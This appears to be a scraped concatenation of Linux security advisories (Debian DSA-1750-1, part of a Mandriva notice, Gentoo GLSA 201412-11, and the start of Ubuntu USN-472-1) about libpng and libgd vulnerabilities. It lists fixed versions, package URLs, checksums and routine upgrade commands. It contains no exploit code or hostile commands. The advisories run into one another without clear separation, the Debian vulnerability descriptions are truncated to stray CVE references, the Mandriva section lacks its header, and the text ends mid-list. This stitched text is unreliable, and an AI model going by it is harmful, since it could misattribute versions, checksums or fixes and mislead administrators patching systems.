CPU consumption). \n\nCVE-2007-3996\n\n Multiple integer overflows exist in libgd\u0027s image resizing and\n creation routines; these weaknesses allow an attacker in control\n of the parameters passed to those routines to induce a crash or\n execute arbitrary code with the privileges of the user running\n an application or interpreter linked against libgd2. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1750-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nMarch 22, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : libpng\nVulnerability : several\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040\nDebian Bug : 446308 476669 516256 512665\n\nSeveral vulnerabilities have been discovered in libpng, a library for\nreading and writing PNG files. (CVE-2008-1382)\n\nThe png_check_keyword might allow context-dependent attackers to set the\nvalue of an arbitrary memory location to zero via vectors involving\ncreation of crafted PNG files with keywords. (CVE-2009-0040)\n\nFor the old stable distribution (etch), these problems have been fixed\nin version1.2.15~beta5-1+etch2. \n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.2.27-2+lenny2. (Only CVE-2008-5907, CVE-2008-5907 and\nCVE-2009-0040 affect the stable distribution.)\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.35-1. \n\nWe recommend that you upgrade your libpng packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz\n Size/MD5 checksum: 829038 77ca14fcee1f1f4daaaa28123bd0b22d\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz\n Size/MD5 checksum: 18622 e1e1b7d74b9af5861bdcfc50154d2b4c\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc\n Size/MD5 checksum: 1033 a0668aeec893b093e1f8f68316a04041\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb\n Size/MD5 checksum: 882 eb0e501247bd91837c090cf3353e07c6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb\n Size/MD5 checksum: 214038 1dd9a6d646d8ae533fbabbb32e03149a\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb\n Size/MD5 checksum: 204478 d04c5a2151ca4aa8b1fa6f1b3078e418\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb\n Size/MD5 checksum: 85270 1fcfca5bfd47a2f6611074832273ac0b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb\n Size/MD5 checksum: 188124 703758e444f77281b9104e20c358b521\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb\n Size/MD5 checksum: 179186 d2596f942999be2acb79e77d12d99c2e\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb\n Size/MD5 checksum: 69056 4bd8858ff3ef96c108d2f357e67c7b73\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb\n Size/MD5 checksum: 63714 14bd7b3fa29b01ebc18b6611eea486d1\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb\n Size/MD5 checksum: 168764 54a349016bbdd6624fe8552bd951fee0\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb\n Size/MD5 checksum: 182720 79e501f9c79d31b0f9c8b5a4f16f6a2e\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb\n Size/MD5 checksum: 74440 e240adb3f2b0f8ed35a3c2fe2dd35da1\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb\n Size/MD5 checksum: 187052 e5f7162d516fc3d8e953726d7fb5b6ae\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb\n Size/MD5 checksum: 194360 83928ed4057deade50551874a6a85d27\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb\n Size/MD5 checksum: 67656 66d9d533e26e4f74fbdd01bf55fa40b1\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb\n Size/MD5 checksum: 187710 20da5a533679aee19edf5cd0c339f2c9\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb\n Size/MD5 checksum: 170784 b19d4f0f8be4d65dbb847079ce2effa8\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb\n Size/MD5 checksum: 227792 eb01ade8e4b4dba3215832b8c632548a\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb\n Size/MD5 checksum: 108076 cb3ae7c7c66dcafce969608a437fdade\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb\n Size/MD5 checksum: 227388 83fa9e2ba1a370fe1b973688ab6096dd\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb\n Size/MD5 checksum: 187814 daa3c7c3aeae294c661324528e0f6c3e\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb\n Size/MD5 checksum: 187016 e556557c1c570c66656232422af38c8e\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb\n Size/MD5 checksum: 67730 ae7ea1cd95eacae754ba35e9fae19818\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb\n Size/MD5 checksum: 67996 4be0aa40152ac55a7355aea2204d7888\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb\n Size/MD5 checksum: 187852 19a6eddae81d4f9d768f8c0ef442b0ed\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb\n Size/MD5 checksum: 187282 119ae6083edd419fed3fe970cc507919\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb\n Size/MD5 checksum: 178452 e48dc544abc3df3ec474930639e29469\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb\n Size/MD5 checksum: 186636 b8319bb815dec618288cdd35cd37c191\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb\n Size/MD5 checksum: 67430 a3717e7c30011e60be99ce04983f2984\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb\n Size/MD5 checksum: 178548 790f01dc85511343a4ef9b4832f3b1fa\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb\n Size/MD5 checksum: 190648 a79ea20f0b8af58765d2b14ec276aa5a\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb\n Size/MD5 checksum: 71438 aa83c3a2ab4da51670da3eafcedddac9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb\n Size/MD5 checksum: 64914 13bcdda845e00493e1b25413452302d0\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb\n Size/MD5 checksum: 184734 0f0e7865607948f07a604c86fd4f94bb\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb\n Size/MD5 checksum: 172558 2853d84c9f9823d0bfe77b1fca00348d\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz\n Size/MD5 checksum: 16783 64d84ee2a3098905d361711dc96698c9\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz\n Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc\n Size/MD5 checksum: 1492 8c82810267b23916b6207fa40f0b6bce\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb\n Size/MD5 checksum: 878 8d46f725bd49014cdb4e15508baea203\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb\n Size/MD5 checksum: 287802 470918bf3d543a1128df53d4bed78b3f\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb\n Size/MD5 checksum: 182372 df321c1623004da3cf1daacae952e8b6\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb\n Size/MD5 checksum: 86746 975dccb76f777be09e8e5353704bf6bf\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb\n Size/MD5 checksum: 71944 3f3bdfdee4699b4b3e5c793686330036\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb\n Size/MD5 checksum: 254598 122c139abf34eb461eca9847ec9dffe7\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb\n Size/MD5 checksum: 167190 1c17a5378b2e6b8fa8760847510f208b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb\n Size/MD5 checksum: 245788 9d3fe182d56caad3f9d8a436ca109b57\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb\n Size/MD5 checksum: 64754 81ee041de30e2e5343d38965ab0645c1\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb\n Size/MD5 checksum: 160222 5741adc357ec8f3f09c4c8e72f02ec88\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb\n Size/MD5 checksum: 67178 71747c7d6f7bffde46bb38055948b781\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb\n Size/MD5 checksum: 246680 bb9df968f72c62d5adceab0079c86e02\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb\n Size/MD5 checksum: 163028 60bf255a23031c9c105d3582ed2c21bd\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb\n Size/MD5 checksum: 261298 a0bac6595474dc5778c764fab4acd9be\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb\n Size/MD5 checksum: 170170 de217ce54775d5f648ad369f4ce7cb72\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb\n Size/MD5 checksum: 74124 affd4f1155bd1d571615b6c767886974\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb\n Size/MD5 checksum: 70314 865ea6726b205467e770d56d1530fdd2\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb\n Size/MD5 checksum: 165892 cfcd37b7eee72625d13f09328bc24e23\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb\n Size/MD5 checksum: 247056 bc860a52608d966576f581c27e89a86c\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb\n Size/MD5 checksum: 305532 d6f329a47a523353fcd527c48abb078c\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb\n Size/MD5 checksum: 207604 78b003ade0b48d1510f436f2e5008588\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb\n Size/MD5 checksum: 112070 a0f1e5e8a85bcc1995faa1e031f5e16e\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb\n Size/MD5 checksum: 68198 a68e0ba1f7a39bd9984414f4160de5bc\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb\n Size/MD5 checksum: 262138 f3580912592abe14609134cab2242728\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb\n Size/MD5 checksum: 163666 0c9f75230c396553e6062eb397d6b95c\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb\n Size/MD5 checksum: 163956 dfda7e322af96e8ae5104cfd9f955e92\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb\n Size/MD5 checksum: 68468 9c357d2d831dca03ed0887c58a18c523\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb\n Size/MD5 checksum: 262162 a1d0ba1b7adb92a95180e6d65b398b5b\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb\n Size/MD5 checksum: 70814 3053467f8b8864802cc7261742abfa00\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb\n Size/MD5 checksum: 166240 13acfd773d2a31bd555ac1936411fe95\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb\n Size/MD5 checksum: 253322 d4a722d84e5c2f263d72a59dea00ce17\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb\n Size/MD5 checksum: 253696 bc748b49195dcd01b5288349e3e85510\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb\n Size/MD5 checksum: 73624 f35735be37fc376c56941795a185c742\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb\n Size/MD5 checksum: 169052 4cf962619d634ea59a39d14c32134594\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb\n Size/MD5 checksum: 66216 07bcad5c11908d2fe6d358dfc94d9051\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb\n Size/MD5 checksum: 247212 f388365559e6b9313aa6048c6fa341f9\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb\n Size/MD5 checksum: 162316 16f01a96b1fec79e9614df831dba6a05\n\n\n These files will probably be moved into the stable distribution on\n its next update. \n \n The updated packages have been patched to correct this issue. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445\n http://www.cert.org/advisories/684664\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2007.0:\n 4483193885966f919f283594719a0a90 2007.0/i586/libpng3-1.2.12-2.3mdv2007.0.i586.rpm\n d13427f7a6494c82a8becec26aaa158f 2007.0/i586/libpng3-devel-1.2.12-2.3mdv2007.0.i586.rpm\n 86e2b902df20f46bbab8c198be7bb623 2007.0/i586/libpng3-static-devel-1.2.12-2.3mdv2007.0.i586.rpm \n 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n 80168137deb6e23d5a2fb6e8f3abc2ef 2007.0/x86_64/lib64png3-1.2.12-2.3mdv2007.0.x86_64.rpm\n b45baf5195b6ffd1d32b5829ff861b50 2007.0/x86_64/lib64png3-devel-1.2.12-2.3mdv2007.0.x86_64.rpm\n 9e4f1d18db609adc5c2f92629814e360 2007.0/x86_64/lib64png3-static-devel-1.2.12-2.3mdv2007.0.x86_64.rpm \n 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm\n\n Mandriva Linux 2007.1:\n 300ed9a63f60a1ee16ce4e5caa71f96b 2007.1/i586/libpng3-1.2.13-2.1mdv2007.1.i586.rpm\n fdd3c3cefc587622382d37cd5fe2795e 2007.1/i586/libpng3-devel-1.2.13-2.1mdv2007.1.i586.rpm\n d6b13aa08877aec2aaf165203d2a6817 2007.1/i586/libpng3-static-devel-1.2.13-2.1mdv2007.1.i586.rpm \n 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n f1289336b45eb58bc2975011086fbfa9 2007.1/x86_64/lib64png3-1.2.13-2.1mdv2007.1.x86_64.rpm\n 8dc0504ac8c6ed8e6c5f641c738df144 2007.1/x86_64/lib64png3-devel-1.2.13-2.1mdv2007.1.x86_64.rpm\n d0b9f63131ecbfe01db295d15903fd40 2007.1/x86_64/lib64png3-static-devel-1.2.13-2.1mdv2007.1.x86_64.rpm \n 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm\n\n Corporate 3.0:\n 9c0077ae596e6a2340ed6e08ab6c437c corporate/3.0/i586/libpng3-1.2.5-10.8.C30mdk.i586.rpm\n 2f44c9f5639aff57948b64cf845efa39 corporate/3.0/i586/libpng3-devel-1.2.5-10.8.C30mdk.i586.rpm\n e1638f0497b35341796bb74ccb5a95e7 corporate/3.0/i586/libpng3-static-devel-1.2.5-10.8.C30mdk.i586.rpm \n 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 632b1254a5b2ee4def5ac2f98bc7bd4c corporate/3.0/x86_64/lib64png3-1.2.5-10.8.C30mdk.x86_64.rpm\n b4ad3f3a34be89a22c7bdfcb8b9f351d corporate/3.0/x86_64/lib64png3-devel-1.2.5-10.8.C30mdk.x86_64.rpm\n 419f3faddaeb3cbfa3ca020630858682 corporate/3.0/x86_64/lib64png3-static-devel-1.2.5-10.8.C30mdk.x86_64.rpm \n 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm\n\n Corporate 4.0:\n a444aa0f9b3c0e5bac0562b3274806a5 corporate/4.0/i586/libpng3-1.2.8-1.3.20060mlcs4.i586.rpm\n 25542984f9b920e9ab9197d383c201b9 corporate/4.0/i586/libpng3-devel-1.2.8-1.3.20060mlcs4.i586.rpm\n a0c238ea1c16f892b704b5055fcc340d corporate/4.0/i586/libpng3-static-devel-1.2.8-1.3.20060mlcs4.i586.rpm \n 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 2ff58096a6a2961e15719aa35107fda6 corporate/4.0/x86_64/lib64png3-1.2.8-1.3.20060mlcs4.x86_64.rpm\n 78ecdacb1033eecfbf48e464d3106bb1 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm\n 85ee7effc74676da27c1c2c1219b97a7 corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm \n 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n ea358d9ef4e412851f89abac96d015b7 mnf/2.0/i586/libpng3-1.2.5-10.8.M20mdk.i586.rpm \n 3068b2316e8225377b88dcaedbadb878 mnf/2.0/SRPMS/libpng-1.2.5-10.8.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (GNU/Linux)\n\niD8DBQFGZcKYmqjQ0CJFipgRAiL/AKDsmAXcJqycmwk5iMfPgWrV8Rl98gCgoeUN\nfefbLet+er8fbszmcgzIKUo=\n=rUB+\n-----END PGP SIGNATURE-----\n\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201412-11\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities\n Date: December 12, 2014\n Bugs: #196865, #335508, #483632, #508322\n ID: 201412-11\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in AMD64 x86 emulation base\nlibraries, the worst of which may allow remote execution of arbitrary\ncode. \n\nBackground\n==========\n\nAMD64 x86 emulation base libraries provides pre-compiled 32-bit\nlibraries. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 app-emulation/emul-linux-x86-baselibs\n \u003c 20140406-r1 \u003e= 20140406-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in AMD64 x86 emulation\nbase libraries. Please review the CVE identifiers referenced below for\ndetails. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll users of the AMD64 x86 emulation base libraries should upgrade to\nthe latest version:\n\n # emerge --sync\n # emerge -1av \"\u003e=app-emulation/emul-linux-x86-baselibs-20140406-r1\"\n\nNOTE: One or more of the issues described in this advisory have been\nfixed in previous updates. They are included in this advisory for the\nsake of completeness. It is likely that your system is already no\nlonger affected by them. \n\nReferences\n==========\n\n[ 1 ] CVE-2007-0720\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720\n[ 2 ] CVE-2007-1536\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536\n[ 3 ] CVE-2007-2026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026\n[ 4 ] CVE-2007-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445\n[ 5 ] CVE-2007-2741\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741\n[ 6 ] CVE-2007-3108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108\n[ 7 ] CVE-2007-4995\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995\n[ 8 ] CVE-2007-5116\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116\n[ 9 ] CVE-2007-5135\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135\n[ 10 ] CVE-2007-5266\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266\n[ 11 ] CVE-2007-5268\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268\n[ 12 ] CVE-2007-5269\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269\n[ 13 ] CVE-2007-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849\n[ 14 ] CVE-2010-1205\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205\n[ 15 ] CVE-2013-0338\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338\n[ 16 ] CVE-2013-0339\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339\n[ 17 ] CVE-2013-1664\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664\n[ 18 ] CVE-2013-1969\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969\n[ 19 ] CVE-2013-2877\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877\n[ 20 ] CVE-2014-0160\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-11.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. =========================================================== \nUbuntu Security Notice USN-472-1 June 11, 2007\nlibpng vulnerability\nCVE-2007-2445\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 6.10\nUbuntu 7.04\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n libpng12-0 1.2.8rel-5ubuntu0.2\n\nUbuntu 6.10:\n libpng12-0 1.2.8rel-5.1ubuntu0.2\n\nUbuntu 7.04:\n libpng12-0 1.2.15~beta5-1ubuntu1\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nDetails follow:\n\nIt was discovered that libpng did not correctly handle corrupted CRC\nin grayscale PNG images. \n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz\n Size/MD5: 16483 713a6e035fa256e4cb822fb5fc88769b\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc\n Size/MD5: 652 bc4f3f785816684c54d62947d53bc0db\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb\n Size/MD5: 846 76eab5d9a96efa186d66cf299a4f6032\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb\n Size/MD5: 69484 078e25586525c4e83abf08c736fa6bd8\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb\n Size/MD5: 113888 46fce5d27ac4b2dea9cf4deb633f824e\n 